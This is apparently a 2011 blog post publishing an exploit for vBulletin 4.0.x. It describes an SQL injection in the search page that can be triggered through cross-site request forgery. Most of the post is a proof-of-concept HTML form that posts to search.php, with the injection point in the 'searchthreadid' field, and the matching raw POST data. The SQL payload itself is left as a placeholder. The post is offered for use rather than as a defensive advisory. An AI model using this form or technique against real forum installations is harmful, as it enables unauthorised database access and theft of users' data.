Monday 26 September 2011

vBulletin 4.0.x (Search) SQLi / Cross-Site Request Scripting


vBulletin 4.0.x (Search) SQLi / Cross-Site Request Scripting




###
# Title : vBulletin 4.0.x (Search) SQLi via Cross-Site Request Scripting

# platform : php
# Impact : Remote SQL Injection Via Cross-Site Request Scripting (CSRF/XSRF = SQLi)
# Tested on : [Windows XP sp3 FR] & [Linux.(Ubuntu 10.10) En] & [Mac OS X 10.6.1] & [BSDi-BSD/OS 4.2]

# (!) Vulnerability Details :

+> Real Provider By : D4rkB1t (d4rkb1t@live.com) | << Thanks For This Great Vulnerability Br0 (^_^)
+> References : [http://1337day.com/exploits/16147]
+> Video (By D4rkB1t) : [http://www.youtube.com/watch?v=fR9RGCqIPkc]

>> You'r Can use the exploit via Cross-Site Request Scripting or Request Forgery ,
> The vulnerability About (SQLi) in method 'post' at Page Search.php - So he is can able CSRF/XSRF


# Proof Of Concept (f.eg) :

<form action="http://localhost/search.php?do=process" method="post" name="vbform" id="searchform">
<input type="hidden" name="type[]" value="7" />
<input type="hidden" id="keyword" class="textbox" name="query" tabindex="1" value="[! Group Name !]" />
<input type="hidden" name="searchuser" id="userfield_txt" tabindex="1" value="" />
<input type="hidden" name="exactname" value="1" id="cb_exactname" tabindex="1" />
<input type="hidden" class="textbox primary popupctrl" name="tag" id="tag_add_input" tabindex="1" value="" />
<input type="submit" class="button" name="dosearch" value="Search Now" tabindex="1" accesskey="s"/>
<input type="hidden" name="s" value="" />
<input type="hidden" name="securitytoken" value="[ T0ken 4 Security ]" />
<input type="hidden" name="do" value="process" />
<input type="hidden" name="searchthreadid" value="&cat[0]=1) SQLi-Code-Here" />
</form>

POST Data [ HTTP dbg ] =

<!--
type[]=7&query=[Group-Name]&searchuser=&exactname=1&tag=&dosearch=Search+N ow
&s=&securitytoken=[Sec-Token]&do=process&searchthreadid=[SQL-Inj3cTi0n-Here]
-->



assassian.h4ck3rs@gmail.com

0 comments: